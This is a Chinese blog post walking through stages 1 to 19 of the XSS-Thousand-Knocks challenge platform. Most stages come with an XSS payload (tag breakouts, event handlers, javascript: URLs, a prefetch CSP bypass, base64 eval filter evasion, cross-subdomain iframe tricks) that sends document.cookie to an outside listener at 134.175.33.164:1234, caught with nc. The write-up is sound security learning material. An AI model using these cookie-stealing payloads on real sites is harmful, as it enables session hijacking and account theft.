<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="XSS-Thousand-Knocks解题记录, 七友&#39;s Blog">
    <meta name="description" content="
文章首发于先知社区https://xz.aliyun.com/t/4074

前言做了一个xss平台的题目，一共34题，题目还不错，这里记录一下解题记录题目地址：传送门
题目这个平台接收flag的形式和其它平台不同，得用vps或者是用xs">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>XSS-Thousand-Knocks解题记录 | 七友&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
</head>


<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <span class="logo-span">七友's Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>关于</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fa fa-address-book"></i>
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="搜索"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <div class="logo-name">七友's Blog</div>
        <div class="logo-desc">
            
            路漫漫其修远兮，吾将上下而求索
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                关于
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-address-book"></i>
                
                友情链接
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>





<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/5.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        XSS-Thousand-Knocks解题记录
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf/" target="_blank">
                                <span class="chip bg-color">ctf</span>
                            </a>
                        
                            <a href="/tags/xss/" target="_blank">
                                <span class="chip bg-color">xss</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-02-14
                </div>

                
				
				
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="fa fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <blockquote>
<p>文章首发于先知社区<a href="https://xz.aliyun.com/t/4074" target="_blank" rel="noopener">https://xz.aliyun.com/t/4074</a></p>
</blockquote>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>做了一个xss平台的题目，一共34题，题目还不错，这里记录一下解题记录<br>题目地址：<a href="https://knock.xss.moe/index" target="_blank" rel="noopener">传送门</a></p>
<h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><p>这个平台接收flag的形式和其它平台不同，得用vps或者是用xss平台去接收cookie（flag在cookie中）</p>
<h2 id="stage1"><a href="#stage1" class="headerlink" title="stage1"></a>stage1</h2><p>第一关它是告诉你你怎么去获取flag的<br>直接把你的payload在这里提交（记住一定是要在这个填入你的payload），然后用你的vps去接受flag就行了<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209165910-f6c26108-2c48-1.png" alt="image.png"><br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">8293927</span>d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe<span class="regexp">/?location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后服务器端用nc监听接收flag<br></p><figure class="highlight lsl"><table><tbody><tr><td class="code"><pre><span class="line">nc -lvvkp <span class="number">1234</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>可以看到成功接收到了flag<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209170638-0255a042-2c4a-1.png" alt="image.png"></p>
<h2 id="stage2"><a href="#stage2" class="headerlink" title="stage2"></a>stage2</h2><p>第二关直接可以嵌入js代码<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209171311-ec63c63c-2c4a-1.png" alt="image.png"><br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209171524-3bb51308-2c4b-1.png" alt="image.png"></p>
<h2 id="stage3"><a href="#stage3" class="headerlink" title="stage3"></a>stage3</h2><p>第三关q参数可控，直接闭合a标签<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209171938-d2b25d60-2c4b-1.png" alt="image.png"><br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209171956-ddeee3c4-2c4b-1.png" alt="image.png"></p>
<h2 id="stage4"><a href="#stage4" class="headerlink" title="stage4"></a>stage4</h2><p>和第三关同理，只不过把双引号变成了单引号</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209172148-209163d2-2c4c-1.png" alt="image.png"><br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209172351-69d3e862-2c4c-1.png" alt="image.png"></p>
<h2 id="stage5"><a href="#stage5" class="headerlink" title="stage5"></a>stage5</h2><p>直接闭合textarea标签<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209172508-97a813f8-2c4c-1.png" alt="image.png"><br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://fea7c73bbe92f7880fc15514e076e838d2ce8a90.knock.xss.moe/?q=<span class="tag">&lt;/<span class="name">textarea</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209172821-0ab721f4-2c4d-1.png" alt="image.png"></p>
<h2 id="stage6"><a href="#stage6" class="headerlink" title="stage6"></a>stage6</h2><p>直接闭合xmp<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209172900-21ce7c84-2c4d-1.png" alt="image.png"><br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://d82fe27901fa05dcfa8980262fc811645543e374.knock.xss.moe/?q=<span class="tag">&lt;/<span class="name">xmp</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209173022-52a5ad1e-2c4d-1.png" alt="image.png"></p>
<h2 id="stage7"><a href="#stage7" class="headerlink" title="stage7"></a>stage7</h2><p>第七关尖括号被转义了<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209173128-7a559568-2c4d-1.png" alt="image.png"></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209173349-ce016fac-2c4d-1.png" alt="image.png"><br>我们可以用onfocus事件，并且用它的autofocus属性去触发onfocus事件<br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">8005</span>f6694d2862438bad3715436522e27dbd81a4.knock.xss.moe<span class="regexp">/?q=XSS" autofocus onfocus="document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209174003-ad542370-2c4e-1.png" alt="image.png"></p>
<h2 id="stage8"><a href="#stage8" class="headerlink" title="stage8"></a>stage8</h2><p>和第七关同理，只不过把双引号变成了单引号<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209174302-178c26b6-2c4f-1.png" alt="image.png"></p>
<p>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>b65797d44372ecb2b2552e32f10ec75f1bddcca6.knock.xss.moe<span class="regexp">/?q=xss' autofocus onfocus='document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209174251-116fec86-2c4f-1.png" alt="image.png"></p>
<h2 id="stage9"><a href="#stage9" class="headerlink" title="stage9"></a>stage9</h2><p>和第七关同理，但是没有引号</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209175510-c9b68eac-2c50-1.png" alt="image.png"><br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe<span class="regexp">/?q=XSS autofocus onfocus=document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209175502-c4b14618-2c50-1.png" alt="image.png"></p>
<h2 id="stage10"><a href="#stage10" class="headerlink" title="stage10"></a>stage10</h2><p>这题双引号被转义了，无法闭合双引号。所以我们可以考虑用javascript伪协议<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209175619-f32198a4-2c50-1.png" alt="image.png"></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209180032-89818660-2c51-1.png" alt="image.png"></p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">811</span>fbf0db9c40565743a37c2978f812b82eb89a6.knock.xss.moe<span class="regexp">/?q=javascript:document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209175846-4ac5567c-2c51-1.png" alt="image.png"></p>
<h2 id="stage11"><a href="#stage11" class="headerlink" title="stage11"></a>stage11</h2><p>和stage10同理</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209180346-fd688420-2c51-1.png" alt="image.png"></p>
<p>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">38</span>e585f94f9d1f6bb79e88b74f3a5b5871d5bb84.knock.xss.moe<span class="regexp">/?q=javascript:document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209180335-f6e291fe-2c51-1.png" alt="image.png"></p>
<h2 id="stage12"><a href="#stage12" class="headerlink" title="stage12"></a>stage12</h2><p>12关发现有CSP，只能默认同源下的资源加载，iframe标签也只能加载同源资源，但是有inline存在，所以我们可以用预加载Bypass掉CSP<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209180949-d5ae7d3a-2c52-1.png" alt="image.png"><br>尝试构造<br></p><figure class="highlight javascript"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">var</span> xss = <span class="built_in">document</span>.createElement(<span class="string">`link`</span>);</span><br><span class="line">xss.setAttribute(<span class="string">`rel`</span>, <span class="string">`prefetch`</span>);</span><br><span class="line">xss.setAttribute(<span class="string">`href`</span>, <span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span>);</span><br><span class="line"><span class="built_in">document</span>.head.appendChild(xss);</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>最终payload<br></p><figure class="highlight ruby"><table><tbody><tr><td class="code"><pre><span class="line"><span class="symbol">http:</span>/<span class="regexp">/a4f51941335441be0fdb21c2890ec17b1d0f08f0.knock.xss.moe/</span><span class="string">?q</span>=<span class="symbol">javascript:</span>var xss = document.createElement(<span class="string">`link`</span>);xss.setAttribute(<span class="string">`rel`</span>, <span class="string">`prefetch`</span>);xss.setAttribute(<span class="string">`href`</span>, <span class="string">`http://134.175.33.164:1234/?${document.cookie}`</span>);document.head.appendChild(xss);</span><br><span class="line">/<span class="regexp">/页面渲染完毕会创建 Link REL=prefetch 的标签，向目标页面发起预加载</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209182107-698930ee-2c54-1.png" alt="image.png"></p>
<h2 id="stage13"><a href="#stage13" class="headerlink" title="stage13"></a>stage13</h2><p>十三关发现过滤了很多字符如window，document,cookie，img等字符，不过fuzz了一下发现svg可以用，其它的我们可以用base64编码绕过<br></p><figure class="highlight lisp"><table><tbody><tr><td class="code"><pre><span class="line">&lt;svg onload=eval(<span class="name">atob</span>(<span class="string">"ZG9jdW1lbnQubG9jYXRpb249YGh0dHA6Ly8xMzQuMTc1LjMzLjE2NDoxMjM0Lz8ke2RvY3VtZW50LmNvb2tpZX1g"</span>))&gt;</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209214338-b48725bc-2c70-1.png" alt="image.png"></p>
<h2 id="stage14"><a href="#stage14" class="headerlink" title="stage14"></a>stage14</h2><p>14关又发现CSP</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209220036-12e09902-2c73-1.png" alt="image.png"><br>但是和12关相比，它没有了unline，所以预加载的方法行不通了，但是我们可以看到这里<br></p><figure class="highlight groovy"><table><tbody><tr><td class="code"><pre><span class="line">frame-src <span class="string">http:</span><span class="comment">//*.knock.xss.moe</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>它允许knock.xss.moe的所有子域的资源可以被frame访问，那么问题来了，我们怎么样才可以用到knock.xss.moe子域的资源呢，灵机一动：既然是所有的子域，我们可利用其它关卡嘛</p>
<p>尝试构造<br></p><figure class="highlight llvm"><table><tbody><tr><td class="code"><pre><span class="line">http://<span class="number">3</span>cb<span class="number">34</span><span class="keyword">c</span><span class="number">8407410e2</span>d<span class="number">6</span><span class="keyword">c</span><span class="number">1</span>d<span class="number">708</span>b<span class="number">786</span>ce<span class="number">69</span>a<span class="number">0192</span>b<span class="number">470</span>.knock.xss.moe/?q=http://e<span class="number">461</span>f<span class="number">5</span>f<span class="number">6</span><span class="keyword">c</span><span class="number">542</span>ae<span class="number">79</span><span class="keyword">ccc</span><span class="number">144093</span><span class="keyword">c</span><span class="number">63</span>d<span class="number">0</span>b<span class="number">074e591</span>cd.knock.xss.moe/?q=XSS<span class="symbol">%20</span>autofocus<span class="symbol">%20</span>onfocus=alert(<span class="number">1</span>)<span class="comment">;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>发现可以执行</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209231642-b4c18556-2c7d-1.png" alt="image.png"></p>
<p>然后我们再通过document.domain指定域，跨域获得flag(cookie)<br>最终payload：<br></p><figure class="highlight llvm"><table><tbody><tr><td class="code"><pre><span class="line">http://<span class="number">3</span>cb<span class="number">34</span><span class="keyword">c</span><span class="number">8407410e2</span>d<span class="number">6</span><span class="keyword">c</span><span class="number">1</span>d<span class="number">708</span>b<span class="number">786</span>ce<span class="number">69</span>a<span class="number">0192</span>b<span class="number">470</span>.knock.xss.moe/?q=http://e<span class="number">461</span>f<span class="number">5</span>f<span class="number">6</span><span class="keyword">c</span><span class="number">542</span>ae<span class="number">79</span><span class="keyword">ccc</span><span class="number">144093</span><span class="keyword">c</span><span class="number">63</span>d<span class="number">0</span>b<span class="number">074e591</span>cd.knock.xss.moe/?q=XSS<span class="symbol">%20</span>autofocus<span class="symbol">%20</span>onfocus=document.domain=`knock.xss.moe`<span class="comment">;window.open(`http://134.175.33.164:1234/?${parent.document.cookie}`)</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209231721-cbc893de-2c7d-1.png" alt="image.png"></p>
<h2 id="stage15"><a href="#stage15" class="headerlink" title="stage15"></a>stage15</h2><p>直接用svg就OK了<br>payload<br></p><figure class="highlight xquery"><table><tbody><tr><td class="code"><pre><span class="line">http://e3bcee011cad77ba066ca7c2ad2884372aec9566.knock.xss.moe/?q=<span class="meta">%3Csvg</span>/onload<span class="built_in">=document</span>.location=`http://<span class="number">134.175</span>.<span class="number">33.164</span>:<span class="number">1234</span>/?$<span class="built_in">{document</span>.cookie}`<span class="meta">%3E</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209233017-9a38767a-2c7f-1.png" alt="image.png"></p>
<h2 id="stage16"><a href="#stage16" class="headerlink" title="stage16"></a>stage16</h2><p>16关是跳转到q参数所对应的网址<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209234736-05ca184c-2c82-1.png" alt="image.png"><br>很容易想到用JavaScript伪协议<br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">86620</span>d66a1b474c588ef787b711b0f1d8843a1af.knock.xss.moe<span class="regexp">/?q=javascript:document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${parent.document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209234712-f75bae24-2c81-1.png" alt="image.png"></p>
<h2 id="stage17"><a href="#stage17" class="headerlink" title="stage17"></a>stage17</h2><p>和stage16一样</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209235428-fb24f28a-2c82-1.png" alt="image.png"><br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">34</span>a131df991487bf58d3df0a85e247d396fb93a0.knock.xss.moe<span class="regexp">/?q=javascript:document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${parent.document.cookie}</span>`</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190209235524-1c84d67a-2c83-1.png" alt="image.png"></p>
<h2 id="stage18"><a href="#stage18" class="headerlink" title="stage18"></a>stage18</h2><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210000233-1c2c77d6-2c84-1.png" alt="image.png"><br>尝试代码注入</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210000303-2e3fd134-2c84-1.png" alt="image.png"><br>发现给单引号前面加了一个<code>\</code>，但是我们在单引号前面再加一个<code>\</code>吃掉它</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210000505-77024604-2c84-1.png" alt="image.png"><br>最终payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>c6a860d0948320766d5c4d8dc3bbdcdf9dd95884.knock.xss.moe<span class="regexp">/?q=1\');document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`;<span class="regexp">//</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210000819-eaa83514-2c84-1.png" alt="image.png"></p>
<h2 id="stage19"><a href="#stage19" class="headerlink" title="stage19"></a>stage19</h2><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210001114-5319455c-2c85-1.png" alt="image.png"><br>尝试代码注入</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210001131-5d036e76-2c85-1.png" alt="image.png"><br>但是我发现我用这个payload老是打不到cookie<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">224</span>d0c5677307d743ba90c8f81e42f5be648cd97.knock.xss.moe<span class="regexp">/?q=XSS%27);window.open(`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`);<span class="regexp">//</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后发现，必须要我把前面那个xss的弹窗点了之后后面的js代码才会触发，然而后台的bot并不会点击弹窗，所以才导致我们后面的代码不会执行，所以我们的利用点必须是在alert里面，尝试一波发现alert里面可以用其它函数，原因不明，有知道的师傅还请科普<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210122843-595e90fe-2cec-1.gif" alt=""><br>最终payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">224</span>d0c5677307d743ba90c8f81e42f5be648cd97.knock.xss.moe<span class="regexp">/?q=XSS',window.open(`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`));<span class="regexp">//</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210123113-b29600e4-2cec-1.png" alt="image.png"></p>
